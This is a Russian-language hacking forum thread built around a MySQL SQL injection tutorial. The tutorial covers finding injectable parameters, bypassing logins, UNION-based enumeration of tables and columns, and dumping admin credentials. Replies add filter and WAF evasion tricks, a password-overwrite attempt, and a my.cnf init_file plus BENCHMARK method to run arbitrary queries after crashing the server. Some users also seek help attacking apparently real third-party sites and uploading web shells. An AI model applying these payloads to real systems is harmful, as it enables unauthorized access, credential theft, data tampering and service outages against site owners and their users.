![]() |
Всем привет.
Темы по sqli на форуме есть, но некоторые моменты, имхо, неосвещены, некоторые упущены. Да и разброс небольшой присутствует. Вот и решил собрать по возможности воедино все, что касается sqli в MySQL, да немного добавить от себя. Конечно, здесь описано далеко не все, опущены слепые скули, обход фильтрации, web-шеллы, чтение файлов на сервере и т.д., но по возможности постараюсь со временем обо всем этом написать. А начну с самого начала - обычные sql-инъекции в MySQL. Часть 1. Теория Немножко пройдемся по азам: Sql-injection (sql-инъекция, sqli, скуль и т.п.) – это уязвимость, позволяющая удаленному пользователю внедрять sql-запросы, непредусмотренные кодом страницы. Что это дает? А дает это возможность чтения из базы данных MySQL необходимой хакеру информации, например, имен и паролей пользователей. Уязвимость возникает в случае, если какие-либо данные, которые вводятся пользователем и направлены в базу данных, не фильтруются, т.е. помимо предусмотренного запроса мы можем добавить запрос, нужный нам. Данные от пользователя к базе данных обычно передаются через GET-параметры, POST-параметры и cookies. Часть 2. Ищем уязвимость Для того, чтобы определить уязвимость, нужно понимать, что происходит, не так ли? И так, предположим, у нас есть скрипт, который обращается к базе данных методом GET с целью получить какой-нибудь параметр, например, данные о пользователе. Предположим, что выглядит он следующим образом: Листинг скрипта user.php PHP highlight Код:
Мы видим, что в переменную $id попадают символы, которые содержатся в адресной строке после "id=", до конца запроса или до символа &. Например, code: site.com/user.php?id=1 В переменную $id попадает единица. Логика запроса такова, что на экран будут выведены все данные о пользователе с идентификатором 1. Что будет, если нарушить логику запроса? Например, поставить традиционную кавычку “'”. code: site.com/user.php?id=1' В таком случае, мускуль не поймет запроса и ругнется нам ошибкой, что-то типа Цитата: You have an error in your SQL syntax check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' Подстановка кавычки, собственно, может дать следующие варианты: 1. Вывод ошибки, как приведено выше. Это означает отсутствие фильтрации вводимых параметров, возможность внедрения своего запроса 2. Ошибка отсутствует, вообще искажается вся страница или ее часть. В таком случае, возможно, просто отключен вывод об ошибках в настройках php. Наличие инъекции возможно. 3. Ничего не меняется. Скорее всего, вводимые данные фильтруются, и инъекции нет. Таким образом, чтобы найти инъекцию в GET параметре, нужно везде ставить кавычки. Но учтите, что, если при user.php?id=1 инъекции нет, то и в user.php?id=2 ее точно не будет, т.к. на уязвимость проверяется параметр id, а не его числовое значение. Кстати, о значениях. Параметры могут быть не только числовыми, а, например, текстовыми: code: site.com/user.php?name=admin А могут выглядеть и так: code: site.com/user/name/id/1 Поэтому не стесняемся – ставим кавычки везде, где есть вероятность «попасть» с запросом в базу данных. Так, с GET параметром вроде разобрались. Теперь POST параметр. Как вы помните, в пост параметр также обычно попадают данные, введенные в поле обычным пользователем, например, форма поиска или авторизации. В таком случае адресная строка браузера как выглядела, так и будет выглядеть, при этом, введенные нами данные «незаметно» для нас уйдут в БД. Процесс проверки наличия уязвимости будет, по сути, таким же, как и при GET-методе передачи. Отдельно следует упомянуть о наличии инъекции в форме авторизации. Предположим, что запрос к БД будет выглядеть таким образом: PHP highlight Код:
Если не фильтруется переменная $login: Запрос в строке, где вводится логин, будет таким: Admin'+--+ Таким образом, в базу данных попадет только логин, проверка по паролю будет отброшена, благодаря использованию комментария MySQL “+--+”. И вуаля – мы админы. Если не фильтруются данные поля для ввода пароля, то запрос в этом поле будет таким: Pass'+or+login=’admin’ Таким образом, значение пароля будет отброшено, и авторизация пройдет по логину admin. Учитывая, что в sql-запрос может быть построен по-другому (например, PHP highlight Код:
), то целесообразно будет сначала выявить принципиальное наличие sqli, используя все ту же кавычку. И если инъекция существует – видоизменять запрос до получения необходимого результата. COOKIES Аналогично проверке при передачи POST параметром, необходимо будет в значения cookies добавить данные, которые теоретически могут вызвать ошибку в sql-запросе. Пользуемся редактором cookies для корректировки запросов, ставим кавычку и обновляем страницу. Собственно, в дальнейшем сосредоточимся именно на методе передачи данных GET, т.к. принципы работы массивов GET, POST и COOKIES идентичны, за исключением разве что внешнего вида. С гетами будет нагляднее. Маленький вывод: поиск уязвимости технически одинаков для любого метода передачи данных из перечисленных – необходимо вызвать ошибку в sql-запросе путем нарушения его логики. Хочу уточнить, что данном мануале я говорю о поиске уязвимости именно в SELECT запросах. Часть 3: эксплуатация уязвимости Эксплуатация sqli осуществляется с использованием оператора sql «SELECT», который используется для извлечения данных из строк одной или нескольких таблиц. Спойлер http://ru.wikipedia.org/wiki/Select_(SQL) Для объединения запросов используется оператор «union» Спойлер http://www.phpclub.ru/mysql/doc/union.html Так как SELECT запросов у нас будет больше одного (один изначально находится в скрипте, другой пишем мы), то без этого оператора мы никак не обойдемся. Однако, для корректной работы связки UNION+SELECT необходимо, чтобы количество столбцов в SELECT-запросах до UNION и после было одинаковым. Поясню на примере. Изначально наш sql-запрос выглядел так: PHP highlight Код:
Учитывая наличие уязвимости, мы хотим дописать запрос: code: site.com/user.php?id=1+UNION+SELECT+1 Теперь наш sql-запрос примет следующий вид: $zapros = mysql_query("SELECT * FROM users WHERE id=1 + UNION + SELECT + 1"); Т.е. мы имеем 2 SELECT запроса, и UNION, который их объединяет. Вот для того, чтобы запрос сработал корректно, нужно, чтобы количество столбцов в таблицах при первом SELECT запросе и втором SELECT запросе совпадало. Итак, определяем количество полей 3.1 Конструкция "order+by+число". Сортирует строки результирующей таблицы данных, по указанному числовому параметру. Если при запросе code: site.com/user.php?id=1+order+by+10+--+ Получаем ошибку, то столбцов меньше 10. Если ошибки нет – то столбцов либо 10, либо больше. 3.2 Конструкция “group+by+число”. Тот же order+by, только наоборот. Если при group+by+10 есть ошибка, то таблиц меньше 10, если ошибки нет, то их 10 или больше. 3.3 На мой взгляд, самая неудобная конструкция, которую я лично никогда не использовал, но напишу: code: site.com/user.php?id=1+UNION+SELECT+1 Выпала ошибка? Идем дальше code: site.com/user.php?id=1+UNION+SELECT+1,2 Опять ошибка. Продолжаем увеличивать …. code: site.com/user.php?id=1+UNION+SELECT+1,2,3,4,5 Ошибки нет. Искомое число – 5. Итак, количество полей для запроса – 5. Идем дальше. Для того, чтобы выводить из базы данных какую-либо информацию, необходимо определить принтабельные поля, через которые это можно сделать. Для этого формируем запрос следующим образом (не забываем, что у нас 5 полей): code: Site.com/user.php?id=-1+UNION+SELECT+1,2,3,4,5 Обратите внимание, что перед 1 я поставил знак минус. Логически можно предположить, что пользователя с идентификатором -1 не существует, поэтому на экран будет выведен минимум информации, и результаты нашего запроса, который стоит после id=-1 будут более заметны. По результатам этого запроса, на странице должны отобразится какие-либо цифры от 1 до 5, эти цифры и будут нашими принтабельными полями. Допустим, это будет поле №2. Первоначально рекомендую вывести из базы данных следующую информацию: Текущая база данных – команда database() Текущий пользователь MySQL – команда user() Текущая версия базы данных – команда version() Особенно важна информация из последней команды – version(). Исходя из того, что покажет данная команда, будем строить и дальнейшие действия. Подставлять запрос следует вместо тех цифр, которые были выведены как принтабельные поля. Собственно, сам запрос будет выглядеть таким образом: site.com/user.php?id=-1+UNION+SELECT+1,version(),3,4,5 На месте двойки на странице сайта будет выведена версия базы MySQL. Если версия 5 и выше, вам повезло. Если 4 – не сильно. Если 3 – то вообще приплыли. Вообще-то 3 ветку я лично даже в глаза не видел, так что и писать о ней не буду. Принципиальное для нас отличие между ветками – появление базы information_schema, в которой хранится структура всей базы данных. Напомню, что любая мускульная база данных имеет таблицы, которые состоят из колонок. Начинаем по порядку Глава 4: определение структуры базы данных 4.1 Версия MySQL 5.x.x Структура любой базы данных данной ветки обязательно содержит стандартную базу information_schema, в которой находятся стандартные таблицы и колонки, не представляющие для нас ровно никакой ценности. Вывод наименований таблиц: code: site.com/user.php?id=-1+UNION+SELECT+1,group_concat(table_name),3,4,5+fr om+information_schema.tables+where+table_schema!=0 x696e666f726d6174696f6e5f736368656d61 Данный запрос: выводит все (group_concat) таблицы (table_name) из information_schema.tables (информационная база таблиц), где имя базы таблиц (table_schema) не является (!=) information_schema 0x696e666f726d6174696f6e5f736368656d61 – это information_schema в hex значении, в качестве конвертора я использую сайт x3k.ru Ограничением (причем, зачастую довольно ощутимым), является вывод не более 1024 символов за раз, поэтому могут вывестись не все таблицы. Аналогом для вывода может служить конструкция limit, которая позволит выводить по одной записи ( в нашем случае – имя таблицы) за запрос. Например, запрос code: site.com/user.php?id=-1+UNION+SELECT+1,table_name,3,4,5+from+information _schema.tables+limit+0,1 выведет нам 1 таблицу limit+1,1 – вторую и так далее. Итак, определили все таблицы в базе данных. Выбираем интересующую нас таблицу, допустим, она называется admin. Теперь нам необходим определить наименование колонок данной таблицы. Делается практически аналогично: code: site.com/user.php?id=-1+UNION+SELECT+1,group_concat(column_name),3,4,5+f rom+information_schema.columns+where+table_name= 0x61646d696e Логика запроса, надеюсь, понятна – она практически идентична предыдущему запросу. Тут обычно длины group_concat абсолютно достаточно, т.к. количество столбцов обычно небольшое. Предположим, что в нашем случае колонки назывались login и pass. Итак, мы определили структуру базы данных, а также выяснили наименование нужных нам таблиц и колонок: таблица admin содержит колонки login и pass. Заключительный этап эпопеи – вывод данных. Составляем следующий запрос: code: site.com/user.php?id=-1+UNION+SELECT+1,group_concat(login,0x3b,pass),3,4 ,5+from+admin В данном случае, выводятся все значения для колонок login и pass из таблицы admin, 0x3b используется как разделитель между ними (для удобочитаемости, эквивалентен точке с запятой). Все, эти данные у нас в руках. 4.2 Версия MySQL 4.x.x Четвертую ветку сознательно пишу после пятой, чтобы новичкам было проще сориентироваться. Как уже говорилось, ключевое для нас отличие между 4 и 5 версиями – information_schema. В 5 версии – есть, в 4 – нет. И это создает для нас определенные трудности. Я опишу самый примитивный способ, а остальные – тема уже других статей, ибо сложные . Так вот, в связи с отсутствием information_schema, мы не можем просто взять и получить наименование таблиц\колонок, так как неоткуда. Проще всего попробовать угадать. Для начала попробуем угадать название таблицы: code: site.com/user.php?id=-1+UNION+SELECT+1,2,3,4,5+from+user Если выпала ошибка – не угадали. Меняем название таблицы: code: site.com/user.php?id=-1+UNION+SELECT+1,2,3,4,5+from+logins И так до того момента, пока не пропала ошибка. В нашем виртуальном случае, без ошибки сработает запрос: code: site.com/user.php?id=-1+UNION+SELECT+1,2,3,4,5+from+admin Теперь надо угадать наименования колонок. Помним, что принтабельное поле у нас 2, действуем аналогично предыдущей логике: code: site.com/user.php?id=-1+UNION+SELECT+1,name,3,4,5+from+admin Ошибка code: site.com/user.php?id=-1+union+SELECT+1,admin_login,3,4,5+from+admin Ошибка code: site.com/user.php?id=-1+UNION+SELECT+1,login,3,4,5+from+admin Есть контакт. Аналогично угадываем колонку с паролем code: site.com/user.php?id=-1+UNION+SELECT+1,pass,3,4,5+from+admin Вывод содержимого колонок делается аналогично выводу в 5 ветке. Маленькое дополнение к теме. Символы комментариев, которые используются в MySQL: code: /* +--+ (знак плюса эквивалентен пробелу) -- # Нужны для того, чтобы отбросить то, что находится после нашего запроса. Зачастую это необходимо, поэтому, если что-то не идет – ставьте (меняйте) указанные символы – есть шанс, что все наладится. Пример запроса: code: site.com/user.php?id=-1+UNION+SELECT+1,pass,3,4,5+from+admin+--+ (или любой другой аналог из указанных выше) Если есть желание попрактиковаться – милости прошу сюда Ну и вообще, как искать sqli, вы должны уже и сами понять. stan_q для HPC (c) 2010 |
Хорошая статья, автор молодец потрудился написал, можно вопрос а чем плохи вот эти темы? Там даже видео есть :-)
https://hpc.name/showthread.php?t=3814&highlight=sql https://hpc.name/showthread.php?t=3547&highlight=sql |
Цитата:
Сообщение от Lucifer2966 Хорошая статья, автор молодец потрудился написал, можно вопрос а чем плохи вот эти темы? Там даже видео есть :-) https://hpc.name/showthread.php?t=3814&highlight=sql https://hpc.name/showthread.php?t=3547&highlight=sql В этих темах не все раскрывается. К дополнению к статье практика https://hpc.name/showthread.php?t=14494 |
Цитата:
Сообщение от Lucifer2966 а чем плохи вот эти темы Ничем не плохи, но я постарался объяснить не только как делать, но и почему это надо делать именно так. Мы же не обезьяны, чтобы просто копировать, а хотим понимать суть происходящего . Плюс добавил несколько весьма полезных приемов, как-то group_concat, table_schema!=, которые упрощают вывод необходимых данных Да, еще немного раскрыл тему sqli в POST и COOKIES, жалко, под рукой нет практического примера. |
дааа уж скуль найти по моему трудней чем XSS и с эксплуатацией сложней. а если скуль использовать(если нашел) какая вероятность того что ты сможешь залогиниться вместо юзверя?!
|
А что ее искать то ? А вот насщет эксплуатации согласен
|
Цитата:
Сообщение от HEX xaKer скуль найти по моему трудней чем XSS и с эксплуатацией сложней Возможно, но результат куда более интересный Цитата: Сообщение от HEX xaKer а если скуль использовать(если нашел) какая вероятность того что ты сможешь залогиниться вместо юзверя?! 100% при условии успешного брута хеша и отсутствии каких-либо ограничений в доступе (например, по ip). |
аа как в гоши искать ?сайты ?
|
Добавление к статье.(обход фильтрации символов)
1.unhex.Если запрос фильтруеться и не выполняеться, тогд в этом случае можно запрос закодировать... PHP highlight Код:
2.CHAR. Допустим что у нас есть file_priv, наш запрос выглятит так PHP highlight Код:
Но вдруг запрос отфильтровало!((( Тогда пробуем зачарить наш запрос... пишем вот такой php скрипт: Спойлер PHP highlight Код:
и вставить шифрованые запрос в: PHP highlight Код:
3.AES_DECRYPT.AES_ENCRYPT.Вполне успешно может сработать и такой запрос! Код: PHP highlight Код:
4.Еще попадаються случаи когда фильтруються цифры и +(плюс). цифры можно заменять на null, а + на /**/ пример с цифрами: PHP highlight Код:
пример с +: PHP highlight Код:
|
Немного добавлю :
- при фильтре, допустим, SELECT: варианты SeleCt, seleSELECTct; - для обхода некоторых фильтров WAF может помочь конструкция /**/, например: code: http://site.com/index.php?id=1/*+select+union+table_name+from+infromation_schema. tables*/--+ либо code: http://site.com/index.php?id=1/*!12345+select+union+table_name+from+infromation_s chema.tables*/--+ Конструкция unhex(hex()) может помочь при чтении данных в какой-нибудь нестандартной кодировке, если при обычном запросе у вас выводятся кракозяблы. code: http://site.com/index.php?id=1+select+union+unhex(hex (table_name))+from+infromation_schema.tables--+ Полезна функция count(), позволяющая определить количество записей в определенной строке, например, запрос code: http://site.com/index.php?id=1select+union+count(login)+from+users--+ даст нам информацию о количестве записей в строке login из таблицы users |
вот такой вопрос? если при подстановке ' => id=1' выдает тип синтаксис ерор. тоесть запрос нее фильтруется? так?
и проводить иньекцию id=1'+order+by ... или так id=1+order+by... |
Цитата:
Сообщение от onekey_nw и проводить иньекцию id=1'+order+by ... или так id=1+order+by... Зависит от скрипта. Если запрос в БД имеет обрамление кавычками параметра (что-то типа SELECT * FROM users WHERE id='id'), то тогда инъекция проводится с кавычкой. Если в скрипте кавычки отсутствуют (WHERE id=id), то проводится без кавычки |
Цитата:
Сообщение от stan_q Возможно, но результат куда более интересный 100% при условии успешного брута хеша и отсутствии каких-либо ограничений в доступе (например, по ip). просто я думаю что на данный момент везде пароли в мд5 хэше, а барсик у меня на вин7 х64 даже не запускается, а поиск по базам беспонтовое занятие если пароль (исходный) скажем qweasdzxc123 то в базах хэша скорей не будет |
Цитата:
Сообщение от HEX xaKer просто я думаю что на данный момент везде пароли в мд5 хэше, а барсик у меня на вин7 х64 даже не запускается, а поиск по базам беспонтовое занятие если пароль (исходный) скажем qweasdzxc123 то в базах хэша скорей не будет Вот скачай и будет тебе счастье |
А не могли бы...подсказать...
Вот у меня скуля: Цитата: http://www.st-martin.org/reservation...ex.php?rubid=1' Но когда я ввожу: http://www.st-martin.org/reservation...+by+1000000000 Ошибка всё-равно имеется... Яне думаю что на сайте столько таблиц...в чём моя ошибка...?) |
Вот все схемы твоего сайта.. В каждой более 10 таблиц.
information_schema st-martinorg st-martinorg1 st-martinorg10 st-martinorg2 st-martinorg20 st-martinorg3 st-martinorg7 st-martinorg8 st-martinorg9 p.s. Пробуй закомментировать конец запроса |
На сайте 11 таблиц) когда ошибка исчезает - значит таблица есть, если ошибка появляется - значит столько таблиц нет. Вот примерно так начинай раскручитвать дальше
Hide: Чтобы просмотреть данный текст, авторизуйтесь на форуме. Пардон, я просто откоментировал про ошибку в запросе пользователя [AngeL]. Сообщение Norton710 если често толком не читал) |
Lucifer2966, вы с Нортоном говорите о разных вещах. Нортон говорит о 10 датасхемах (schema), которые находятся по запросу schema_name+from_information_schema.schemata
|
Отличная книга по скулям (прямая ссылка)
http://www.ptsecurity.ru/download/PT...-Injection.pdf Автор - Дмитрий Евтеев |
хэлп,есть сайт со скулей
Hide: Чтобы просмотреть данный текст, авторизуйтесь на форуме. как можно через неё залить шелл(File_priv Y) ? |
Попробовал sql injection в dvwa, и не понял одного : я вывел все таблицы , но когда вызываю содержимое таблиц то открывается только таблица users , а кредитные карточки и accounts не открываются , появляется ошибка что нет таких таблиц , хотя я их видел когда мне показывало все таблицы. Почему я эти две таблицы (кредиток и accounts) не могу открыть? Заранее спасибо за ответ.
|
fragg есть вариант что ты не видишь все таблицы , для этого когда ты запрашиваешь таблицы ты дожен написать where таблица не равана (!=) information schema и тогда тебе выдаст не всё а только нужные таблицы. Это описывается в этой теме в первом сообщении.
И тогда ты увидишь Users ) |
День добрый
вывел названия баз information_schema test veter_main вывел таблицы CHARACTER_SETS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES ENGINES EVENTS FILES GLOBAL_STATUS GLOBAL_VARIABLES KEY_COLUMN_USAGE PARTITIONS PLUGINS PROCESSLIST PROFILING REFERENTIAL_CONSTRAINTS ROUTINES SCHEMATA SCHEMA_PRIVILEGES SESSION_STATUS SESSION_VARIABLES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS вывел колонки , где искать User ?? katalog = = = id,shtrich,name,GrupeId,Price,Ostatok kel_config == title,email kel_search == id,country,city,nights,days,starting_date,price,fl ag,LINK,currency kel_searchform = = id,country,city kel_structure == id,name,parentID,content |
Очевидно, пользователей нет. Уверен что они вообще должны быть?))
|
Цитата:
Сообщение от fragg Админка есть Это ничего не значит. Логин/пароль может быть записан в php файле, а не в БД. |
отсеял таблицу information_schema. еще в начале нету users как ни крути
таблицы в них вот эти колонки katalog id,shtrich,name,GrupeId,Price,Ostatok kel_config title,email kel_search id,country,city,nights,days,starting_date,price,fl ag,LINK,currency kel_searchform id,country,city kel_structure id,name,parentID,content как видно ничего похожего на users password, Админка есть |
fragg, выведи список всех БД для начала. Скорее всего твои юзеры в другой базе, на которую у тебя нет прав чтения.
|
fragg вот [►] видео на ютуб по sql-inj в dvwa. С ним ты во всем разберешся. Лично мне оно очень помогло. Удачи )
|
Вывод баз
Hide: Чтобы просмотреть данный текст, авторизуйтесь на форуме. Получилось information_schema test veter_main таблицы и колонки показаны в посте #22 -------------------------------------------- Склоняюсь к мысли что лог/пасс - где угодно, но не в базах PS: за видео спасибо. |
Цитата:
Сообщение от rox@hak не получается никак заупдатить базу, тоесть подменить значение пассворд! в какую сторону копать? юнион селект работает все отлично проходит база читается, вытянул все, но хочу сделать code: id=-123';+update+a_admin+set+password='123'+where+emai l='admin@admin.ru'+--+ никак не выходит! в чем может быть проблема? на странице есть еще одна ошибка самого упдате, может как то можно сделать вложение типа - code: UPDATE per*sons SET street = 'Nis*sesti*en 67', ci*ty = 'Sand*nes' WHERE lastname = 'Tjes*sem' AND UPDATE per*sons SET street = 'Nis*sesti*en 67', ci*ty = 'Sand*nes' WHERE lastname = 'Tjes*sem' AND firs*tna*me = 'Ja*kob' ? актуально |
rox@hak
Свой 2 запрос таким образом через GET-запрос задать нельзя - не сработает в большинстве случаев. Можно только совершить действие через оператор union, причем первоначальная операция должна совпадать с операцией, которая задается через юнион. Например, если изначально идет запрос SELECT, то можно написать только + union + select, union+update тоже не сработает. Если тебе надо апдейтить базу, то можно попробовать найти скулю в update - запросе и действовать через union. |
Цитата:
Сообщение от Nick Hander rox@hak Свой 2 запрос таким образом через GET-запрос задать нельзя - не сработает в большинстве случаев. Можно только совершить действие через оператор union, причем первоначальная операция должна совпадать с операцией, которая задается через юнион. Например, если изначально идет запрос SELECT, то можно написать только + union + select, union+update тоже не сработает. Если тебе надо апдейтить базу, то можно попробовать найти скулю в update - запросе и действовать через union. как раз есть и в упдате, буду пробовать там + union+update попробовал не прокатило на запрос code: http://site.ru/hb/sry.php?t=-242'+union+UPDATE+a_admin+SET+dbid=ss+where+email= 'psp@se.net'+--+; ответ code: Error: can't execute query : UPDATE lib_content set views=views+1 where dbid='-242' union UPDATE a_admin SET dbid='ss' where email='psp@softhome.net' -- ' Всеравно не упдатится, может запрос не так сделал? какие мысли есть по этому поводу? |
не получается никак заупдатить базу, тоесть подменить значение пассворд! в какую сторону копать? юнион селект работает все отлично проходит база читается, вытянул все, но хочу сделать
code: id=-123';+update+a_admin+set+password='123'+where+emai l='admin@admin.ru'+--+ никак не выходит! в чем может быть проблема? на странице есть еще одна ошибка самого упдате, может как то можно сделать вложение типа - code: UPDATE per*sons SET street = 'Nis*sesti*en 67', ci*ty = 'Sand*nes' WHERE lastname = 'Tjes*sem' AND UPDATE per*sons SET street = 'Nis*sesti*en 67', ci*ty = 'Sand*nes' WHERE lastname = 'Tjes*sem' AND firs*tna*me = 'Ja*kob' ? |
rox@hak, а чего-то у тебя кавычку комментарием не отрезало в конце запроса. Попробуй другие, например # или /*
Кстати, a_admin это имя таблицы такое? Nick Hander,в данном случае это не нужно, но можно через SELECT ... UNION любые операторы выполнять если есть file_priv: code: UNION SELECT '[mysqld]\ninit_file="UPDATE ... INSERT.. DELETE... да любой запрос"\n#' INTO OUTFILE '/var/lib/mysql/my.cnf' Потом что-нибудь типа code: UNION SELECT BENCHMARK(9999999, BENCHMARK(9999999,md5(0x1488))) Чтобы сервер обосрался и лёг нахрен. После перезапуска сервера запрос, записанный в my.cnf, будет выполнен. Кстати... Цитата: Сообщение от Nick Hander запрос таким образом через GET-запрос задать нельзя А через post или cookie типа можно было бы? -) |
А через post или cookie типа можно было бы? -)
Я не говорил об этом. Просто сказал GET-запрос, потому что rox@hak как раз атаковал именно через get запрос. Как бы уточняющее слово, а не противопоставление. Еще я сказал в большинстве случаев, поскольку по умолчанию на серверах file_priv настроен, и такие запросы блокируются. Цитата: Чтобы сервер обосрался и лёг нахрен. После перезапуска сервера запрос, записанный в my.cnf, будет выполнен. Какой ты беспощадный)) |
что означают вот эти ошибки
code: Query failed: The used SELECT statements have a different number of columns и этот , эту нашел когда искал пассивку code: CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '>alert("xss")%" OR title like "%">alert("xss")' at line 1 |
D@Gshram, первая ошибка - ты неверно подобрал кол-во столбцов.
Вторая - у тебя инъекция через LIKE, забей на пасссивку и крути. Хотя SQLiXSS тоже тема. Попробуй убрать "> перед скриптами. |
убрал вот опять таже фишка Ошибка 500
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'xss")%" OR title like "%alert("xss")%"' at line 1 когда пишу в строке поиска выходит вот это. а xss там нету |
Забей значит на xss, крути как скулю. И не вздумай спросить ещё в этой теме, как крутить скулю))
|
ниче не понял. вот смотри тогда сам Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме. |
| Время: 19:04 |